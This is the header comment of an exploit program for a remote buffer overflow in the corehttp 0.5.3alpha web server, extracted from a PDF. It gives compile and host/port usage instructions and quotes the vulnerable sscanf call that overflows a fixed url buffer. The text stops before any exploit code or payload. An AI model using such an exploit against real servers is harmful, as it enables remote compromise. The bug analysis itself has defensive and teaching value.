corehttp 0.5.3alpha httpd Remote Buffer Overflow Exploit.pdf

1 /*[ corehttp[v0.5.3alpha]: httpd remote buffer overflow exploit. ]********** 2 * * 3 * by: vade79/v9 v9@fakehalo.us (fakehalo/realhalo) * 4 * * 5 * compile: * 6 * gcc xcorehttp.c −o xcorehttp * 7 * * 8 * syntax: * 9 * ./xcorehttp [−r] −h host −p port * 10 * * 11 * corehttp homepage/url: * 12 * http://corehttp.sourceforge.net/ * 13 * * 14 * bug(http.c): * 15 * −−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−− * 16 * struct sprock_t *HttpSprockMake(struct sprock_t *parentsprock) { * 17 * struct sprock_t *sprocket; * 18 * char req[PATHSIZE], url[PATHSIZE], status[PATHSIZE], temp[BUFSIZE], * 19 * ... * 20 * if ((sprocket = (struct sprock_t *) * 21 * malloc(sizeof(struct sprock_t))) == NULL) return NULL; * 22 * ... * 23 * sscanf(parentsprock−>buffer, "%[A−Za−z] %s%*[ \t\n]", req, url); * 24 * !(the bug/overwrite) −−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−^−−−−^ * 25 * strncpy(sprocket−>parent−>url, url, PATHSIZE); * 26 * !(the problem) −^